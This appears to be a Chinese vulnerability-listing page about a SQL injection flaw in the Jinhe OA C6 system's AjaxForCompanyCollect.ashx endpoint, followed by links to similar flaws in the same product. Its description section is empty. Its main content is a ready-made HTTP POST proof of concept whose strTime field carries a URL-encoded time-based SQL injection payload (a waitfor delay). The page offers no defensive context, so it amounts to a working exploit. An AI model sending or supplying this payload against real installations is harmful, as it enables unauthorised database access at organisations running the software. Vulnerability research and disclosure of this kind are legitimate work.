金和OA C6系统 AjaxForCompanyCollect.ashx SQL注入漏洞

漏洞描述

PoC代码

POST /c6/JHSoft.Web.CostControl/Collect/Handlers/AjaxForCompanyCollect.ashx HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36

strType=getCollectList&strTime=%31%3b%77%61%69%74%66%6f%72%20%64%65%6c%61%79%27%30%3a%30%3a%36%27%2d%2d&strAppType=start&strYear=2012

相关漏洞推荐

• POC 金和OA C6系统 AjaxForDepartmentCollect.ashx SQL注入漏洞
• 金和OA C6系统 AjaxForGetBudgetTime.ashx SQL注入漏洞
• 金和OA C6系统 ProjectInfos.aspx SQL注入漏洞
• 金和OA C6系统 Print1.aspx 权限管理不当漏洞
• 金和OA C6系统 XmlDeal.aspx SQL注入漏洞
• 金和OA C6系统 BookGetStoreType.aspx SQL注入漏洞
• 金和OA C6系统 AskDoc.aspx XML外部实体注入漏洞
• 金和OA C6系统 AssTypeSendXML.aspx XML外部实体注入漏洞
• 金和OA C6系统 XmlHttpGetPrintNumber.aspx SQL注入漏洞
• 金和OA C6系统 ArchivesShowAskAip.aspx SQL注入漏洞
• 金和OA C6系统 ArchivesShowSendAip.aspx SQL注入漏洞
• 金和OA C6系统 ArchivesRoomDeptSave.aspx XML外部实体注入漏洞
• 金和OA C6系统 ArchivesInfoAcceptAip.aspx SQL注入漏洞